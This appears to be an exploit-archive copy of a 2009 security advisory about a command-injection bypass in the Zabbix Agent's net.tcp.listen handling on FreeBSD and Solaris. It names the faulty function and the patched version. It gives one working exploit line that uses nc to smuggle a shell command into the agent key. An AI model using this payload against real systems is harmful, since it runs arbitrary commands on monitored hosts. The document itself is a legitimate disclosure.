Zabbix Agent 1.6.7 - Remote Bypass

ID EXPLOITPACK:67139CA9C932B2F700854B233E083A1D
Type exploitpack
Reporter Nicob
Modified 2009-12-14T00:00:00


Zabbix Agent 1.6.7 - Remote Bypass

                                            Zabbix Agent : Bypass of EnableRemoteCommands=0 From: Nicob <nicob () nicob net>
Date: Sun, 13 Dec 2009 16:28:30 +0100

From Wikipedia : "Zabbix is a network management system application

[...] designed to monitor and track the status of various network
services, servers, and other network hardware."

[Zabbix Agent : Bypass of EnableRemoteCommands=0]

Impacted software : Zabbix Agent (FreeBSD and Solaris only)
Zabbix reference :
Patched version : 1.6.7

Faulty source code : function NET_TCP_LISTEN() in

Exploit : $> echo "net.tcp.listen[80';id;echo ']"|nc -vn xxxxx 10050
Limitation : attacker must come from (or spoof) a trusted IP address

Changelog entry : fixed security vulnerability in processing of
net.tcp.listen under FreeBSD and Solaris agents